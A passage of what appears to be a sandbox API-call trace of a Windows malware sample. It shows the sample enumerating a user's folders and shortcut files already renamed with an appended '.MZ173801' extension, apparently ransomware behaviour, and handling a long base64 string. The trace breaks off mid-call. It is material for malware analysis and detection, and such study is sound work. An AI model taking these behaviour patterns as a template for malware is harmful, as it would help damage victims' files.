ftLastAccessTime.dwLowDateTime=0x75781b53, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa4115711, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2e5, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Videos.lnk.MZ173801", cAlternateFileName="VIDEOS~1.MZ1")) returned 1 [0113.415] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.415] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.415] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea97eea1, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb1d7549, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa4115711, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4ad, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="VmAilK6Ug.lnk.MZ173801", cAlternateFileName="VMAILK~1.MZ1")) returned 1 [0113.415] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.415] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.415] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec17ca31, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x9d04a7b8, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa430550f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3d7, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="WjAE.lnk.MZ173801", cAlternateFileName="WJAELN~1.MZ1")) returned 1 [0113.415] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.415] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.415] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea08e4b1, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea08e4b1, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa430550f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x426, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="wk25qq4bwLfkVhGZ.lnk.MZ173801", cAlternateFileName="WK25QQ~1.MZ1")) returned 1 [0113.415] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.416] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.416] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1a1cc3, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x6f1a1cc3, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa432b7dc, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x292, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="WUbrVo Nrjfu.lnk.MZ173801", cAlternateFileName="WUBRVO~1.MZ1")) returned 1 [0113.416] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.416] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.416] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75fe5c49, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75fe5c49, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa432b7dc, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2b0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="x-fqzeifd646TQM_WO.lnk.MZ173801", cAlternateFileName="X-FQZE~1.MZ1")) returned 1 [0113.416] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.416] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.416] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x869ed3ef, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x869ed3ef, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa432b7dc, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x441, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="XbxN-s5VyE.lnk.MZ173801", cAlternateFileName="XBXN-S~1.MZ1")) returned 1 [0113.416] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.416] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.416] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6aa375, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x8153085c, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa4351a51, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x23b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="XDnTXxKBW.lnk.MZ173801", cAlternateFileName="XDNTXX~1.MZ1")) returned 1 [0113.416] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.416] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.416] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec2fa1b4, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec2fa1b4, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa4351a51, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="XO1z23.lnk.MZ173801", cAlternateFileName="XO1Z23~1.MZ1")) returned 1 [0113.416] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.416] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.416] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75984006, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75984006, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa4816557, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3db, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Yv-akVjSVB.lnk.MZ173801", cAlternateFileName="YV-AKV~1.MZ1")) returned 1 [0113.416] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.416] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.416] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7415864f, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7415864f, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa483c896, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x279, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="ZB jpmR.lnk.MZ173801", cAlternateFileName="ZBJPMR~1.MZ1")) returned 1 [0113.416] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.416] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.416] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75444d8d, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75444d8d, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa483c896, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3ef, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="zcoh 1oAdzcJIB.lnk.MZ173801", cAlternateFileName="ZCOH1O~1.MZ1")) returned 1 [0113.416] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.416] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.416] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaf028f7, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeaf028f7, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa483c896, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x27e, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="zcrVUSJG.lnk.MZ173801", cAlternateFileName="ZCRVUS~1.MZ1")) returned 1 [0113.416] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.416] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.416] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec3466b1, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec3466b1, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa4b37709, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x53f, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="ZrVO9ZIsn.flv.lnk.MZ173801", cAlternateFileName="ZRVO9Z~1.MZ1")) returned 1 [0113.416] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.416] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.416] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9cae5f4, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9cae5f4, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa4b37709, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3cc, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="zvmVe w.lnk.MZ173801", cAlternateFileName="ZVMVEW~1.MZ1")) returned 1 [0113.416] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.416] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.416] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b9654e6, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x8b9654e6, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa4b5da1d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x424, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="zY_vL.lnk.MZ173801", cAlternateFileName="ZY_VLL~1.MZ1")) returned 1 [0113.416] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.416] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.417] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81498029, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x81498029, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa4b5da1d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x348, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="_5 PohF4cOl3RenyNkzK.lnk.MZ173801", cAlternateFileName="_5POHF~1.MZ1")) returned 1 [0113.417] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.417] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.417] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea8e68ba, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x7e4b1910, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa4b83c6d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x382, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="_C-ZbiqZ3CWgavc2.lnk.MZ173801", cAlternateFileName="_C-ZBI~1.MZ1")) returned 1 [0113.417] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.417] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.417] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75ec2c33, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75ec2c33, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa4b83c6d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x5b9, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="_HdsGmu6OGd.lnk.MZ173801", cAlternateFileName="_HDSGM~1.MZ1")) returned 1 [0113.417] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.417] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.417] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75ec2c33, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75ec2c33, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa4b83c6d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x5b9, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="_HdsGmu6OGd.lnk.MZ173801", cAlternateFileName="_HDSGM~1.MZ1")) returned 0 [0113.417] GetLastError () returned 0x12 [0113.417] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0113.417] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=39, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Pictures") returned 1 [0113.419] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0113.419] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=39, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Pictures") returned 1 [0113.419] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5611485, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5611485, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0113.419] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5611485, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5611485, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0113.419] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a378aa0, ftCreationTime.dwHighDateTime=0x1d5e44e, ftLastAccessTime.dwLowDateTime=0xce529900, ftLastAccessTime.dwHighDateTime=0x1d5e8b2, ftLastWriteTime.dwLowDateTime=0xce529900, ftLastWriteTime.dwHighDateTime=0x1d5e8b2, nFileSizeHigh=0x0, nFileSizeLow=0x15a20, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="-116L1WcvYJmv_lb Zj-.bmp", cAlternateFileName="-116L1~1.BMP")) returned 1 [0113.419] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0113.419] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.420] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\-116L1WcvYJmv_lb Zj-.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\-116l1wcvyjmv_lb zj-.bmp"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a378aa0, ftCreationTime.dwHighDateTime=0x1d5e44e, ftLastAccessTime.dwLowDateTime=0xce529900, ftLastAccessTime.dwHighDateTime=0x1d5e8b2, ftLastWriteTime.dwLowDateTime=0xce529900, ftLastWriteTime.dwHighDateTime=0x1d5e8b2, nFileSizeHigh=0x0, nFileSizeLow=0x15a20)) returned 1 [0113.420] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.420] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0113.420] GetCurrentThreadId () returned 0x1358 [0113.420] GetCurrentThreadId () returned 0x1358 [0113.420] GetCurrentThreadId () returned 0x1358 [0113.421] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 